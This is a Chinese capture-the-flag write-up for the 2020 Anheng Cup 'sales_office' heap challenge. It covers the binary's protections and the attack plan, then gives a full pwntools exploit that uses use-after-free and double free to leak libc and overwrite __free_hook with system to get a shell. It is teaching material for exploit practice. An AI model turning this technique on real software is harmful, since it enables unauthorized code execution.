(uaf/double free)2020安恒杯4月赛sales_office

基本信息

	Arch:     amd64-64-little
	RELRO:    Partial RELRO
	Stack:    Canary found
	NX:       NX enabled
	PIE:      No PIE (0x400000)
	dynamically
	18.04

IDA分析

add

show

free

思路

1. 申请的chunk最大为0x60 存在uaf和double free
2. 利用uaf没有将ptr置为NULL。修改fd指向got，然后得到libc_base
3. 修改free_hook为system然后free 触发！

exp图

exp

#coding: utf-8
from pwn import *
context.log_level = 'debug'
local =1
if local:
    p = process("./sales_office")
    elf = ELF("./sales_office")
    libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
else:
    p = remote()
    elf = ELF("")
    libc = elf.libc

def add(size,content):
    p.sendlineafter("choice:","1")
    p.sendlineafter("size of your house:",str(size))
    p.sendlineafter("please decorate your house:",content)

def show(index):
    p.sendlineafter("choice:","3")
    p.sendlineafter("index:\n",str(index))
def free(index): 
    p.sendlineafter("choice:","4")
    p.sendlineafter("index:\n",str(index))

def debug():
    print("[+]----pid%s"%proc.pidof(p)) 
    pause()    
lg=lambda address,data:log.success('[+]---->%s: '%(address)+hex(data))

def pwn():
    #-----uaf fd
    add(0x20,"a"*0x10) #0
    add(0x20,"b"*0x10) #1
    add(0x20,"/bin/sh\x00") #2
    
    free(1)
    free(0)
    add(8,p64(elf.got['puts'])) #3
    show(1)
    p.recvuntil("house:\n")
    libc_base = u64(p.recv(6).ljust(8,"\x00"))-0x809c0
    lg("libc_base",libc_base)
    #-----
    free_hook = libc_base+libc.sym['__free_hook']
    system_addr = libc_base +libc.sym['system']
    lg("free_hook",free_hook)
    #-----double free
    free(3)
    free(3)
    add(0x8,p64(free_hook))
    add(0x20,"p"*0x10)
    add(0x8,p64(system_addr))

    free(2)
    #debug()

    p.interactive()

if __name__ == "__main__":
    pwn()

知识点

uaf 利用特性：没有清空指针，如何可以修改fd指针可以达到任意地址读写的操作
double free特性: 能对同一个chunk free两次，结合uaf修改可以任意读写
#-----问题1
Cannot get main_arena's symbol address. Make sure you install libc debug file (libc6-dbg & libc6-dbg:i386 for debian package).
can't find heap info
#-----解决1
apt-get install lib32z1 lib32ncurses5
apt-get install lib32stdc++6